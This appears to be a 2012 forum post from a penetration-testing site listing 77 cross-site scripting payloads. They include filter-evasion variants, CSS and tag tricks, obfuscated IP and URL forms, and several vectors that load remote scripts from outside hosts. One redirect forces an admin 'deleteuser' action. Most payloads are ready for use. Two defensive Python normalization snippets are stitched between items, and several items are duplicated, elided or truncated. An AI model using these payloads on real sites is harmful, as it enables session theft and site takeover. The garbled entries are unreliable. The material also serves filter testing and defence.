China Network Penetration Testing Alliance
Title: Detailed XSS exploitation compendium, part 1
Author: admin
Date: 2012-9-13 17:04
Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the shell and change the shell to the JPG image format; when the image-format shell is visited, our shell is still executed.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are essentially ineffective in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
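The IMG-tag variants in items (3) to (19) all defeat the same kind of filter: one that looks for the literal string javascript: before the browser has decoded character references and discarded whitespace and control characters. The following is an added example of my own, not code from the original post, that normalizes an attribute value the way a forgiving browser does and only then reads the scheme; treating NUL like tab and newline is an assumption made to match the most permissive engines, and the sample inputs are constructed.

```python
import html
import re

# ASCII control characters and space are stripped from both ends of a URL.
_EDGE_JUNK = "".join(chr(c) for c in range(0x21)) + "\x7f"
# Tab, CR and LF are dropped anywhere inside a URL (WHATWG URL parsing).
# NUL is added on the assumption that we want to match the most permissive
# engines, the older ones that items (17) and (18) rely on.
_INNER_JUNK = re.compile(r"[\t\n\r\x00]")
_SCRIPT_SCHEMES = {"javascript", "vbscript"}


def normalize_url_attr(value: str) -> str:
    """Canonicalize an HTML attribute value as a forgiving browser would."""
    # Decimal and hex character references, with or without the trailing
    # semicolon (items 5, 8, 9 and 10), become the characters they encode.
    value = html.unescape(value)
    # Leading/trailing junk (item 19) and embedded tab/newline/CR/NUL
    # (items 11 to 14 and 17) are discarded before the scheme is read.
    value = value.strip(_EDGE_JUNK)
    return _INNER_JUNK.sub("", value)


def scheme_of(value: str) -> str:
    """Lower-cased URL scheme of the normalized value, or '' if it has none."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", normalize_url_attr(value))
    return match.group(1).lower() if match else ""


def is_script_url(value: str) -> bool:
    """True if a browser would execute the attribute value as script."""
    return scheme_of(value) in _SCRIPT_SCHEMES


if __name__ == "__main__":
    # Constructed samples covering the evasions listed in items 3 to 19.
    samples = [
        "javascript:alert('XSS')",
        "JaVaScRiPt:alert('XSS')",
        "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
        "jav&#x09;ascript:alert('XSS')",
        "java\x00script:alert('XSS')",
        " javascript:alert('XSS')",
        "http://example.com/a.jpg",
    ]
    for sample in samples:
        print(f"{is_script_url(sample)!s:5} {sample!r}")
```

A filter that applies this check to every URL-valued attribute (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC and the like) before rendering is what the items above are probing for.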

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; arbitrary commands can be executed
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
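Items (70) to (76) all produce a link whose host string does not look like the host it actually reaches, which defeats an allowlist that compares the raw text. The following is an added example of my own, not code from the original post, that canonicalizes a link target's host the way a browser does before any allowlist comparison: scheme-relative links get a scheme, a trailing dot is removed, and decimal, hex, octal and mixed IPv4 spellings are reduced to the dotted quad they resolve to. The IPv4 rules follow the WHATWG URL host parser in general (of which the page's items are instances, so "127.1" is handled too); the default scheme for scheme-relative links is an assumption, and the sample URLs are constructed from the page's items.

```python
from urllib.parse import urlsplit


def parse_ipv4_host(host: str):
    """Dotted-quad form of an IPv4 host written in any form a browser accepts
    (one to four parts; decimal, 0x hex or leading-0 octal; the last part
    supplies the remaining low-order bytes), or None if it is not IPv4."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                       # "1.2.3.4." carries a trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    numbers = []
    for part in parts:
        if part[:2].lower() == "0x":
            digits, base = part[2:], 16
        elif len(part) > 1 and part[0] == "0":
            digits, base = part[1:], 8
        else:
            digits, base = part, 10
        if digits == "":
            if base == 10:
                return None               # empty part, e.g. "1..2"
            numbers.append(0)             # "0x" or "0" alone means zero
            continue
        if not (digits.isascii() and digits.isalnum()):
            return None                   # int() would accept "+1" or "1_0"
        try:
            numbers.append(int(digits, base))
        except ValueError:
            return None                   # not numeric in this base: a name
    if any(n > 255 for n in numbers[:-1]):
        return None
    if numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    value = numbers[-1]                   # last part fills the remaining bytes
    for i, n in enumerate(numbers[:-1]):
        value += n * 256 ** (3 - i)
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str, default_scheme: str = "https") -> str:
    """Host of a link target in the form an allowlist should compare against."""
    if url.startswith("//"):              # item 74: scheme-relative link
        url = default_scheme + ":" + url
    # urlsplit lower-cases the host; the trailing dot is item 76.
    host = (urlsplit(url).hostname or "").rstrip(".")
    return parse_ipv4_host(host) or host
```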

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)